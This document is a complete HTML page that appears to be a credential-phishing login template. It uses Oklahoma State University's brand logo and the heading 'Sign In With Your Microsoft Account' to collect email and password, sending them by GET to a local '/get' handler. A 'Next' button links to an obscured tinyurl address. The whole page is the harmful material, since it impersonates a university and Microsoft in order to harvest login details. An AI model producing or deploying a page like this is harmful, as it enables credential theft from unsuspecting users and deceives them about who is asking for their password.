<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@900&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;
            margin: 0;
            padding: 0;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .container {
            max-width: 400px;
            padding: 25px;
            margin: auto;
        }

        .form {
            max-width: 300px;
            padding: 20px;
            border: 1px solid #cccccc;
            border-radius: 5px;
            margin: 0 auto;
        }

        h1 {
            text-align: center;
            font-family: 'Roboto', sans-serif;
            font-size: 35px;
            color: #Fe5c00;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        a {
            width: 100%;
            background-color: #Fe5c00;
            color: white;
            padding: 14px 20px;
            margin-top: 8px;
            margin-bottom: 8px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            text-decoration: none;
        }

        a:hover {
            background-color: #b14100;
        }

        img {
            display: block;
            margin-bottom: 25px;
            width: 350px;
            height: 150px;
        }
    </style>
</head>

<body>
    <div class="container">
        <img src="https://brand.okstate.edu/site-files/images/brand-guide/primary-brand.png">
        <form action="/get" method="get" id="email-form-step" class="form">
            <h1>Sign In With<br>Your Microsoft Account</h1>
            <input name="email" type="text" placeholder="Email" required>
            <input name="password" type="password" placeholder="Password" required>
            <br>
            <br>
            <a href="https://tinyurl.com/4fkxhsf8">Next</a>
        </form>
    </div>
</body>

</html>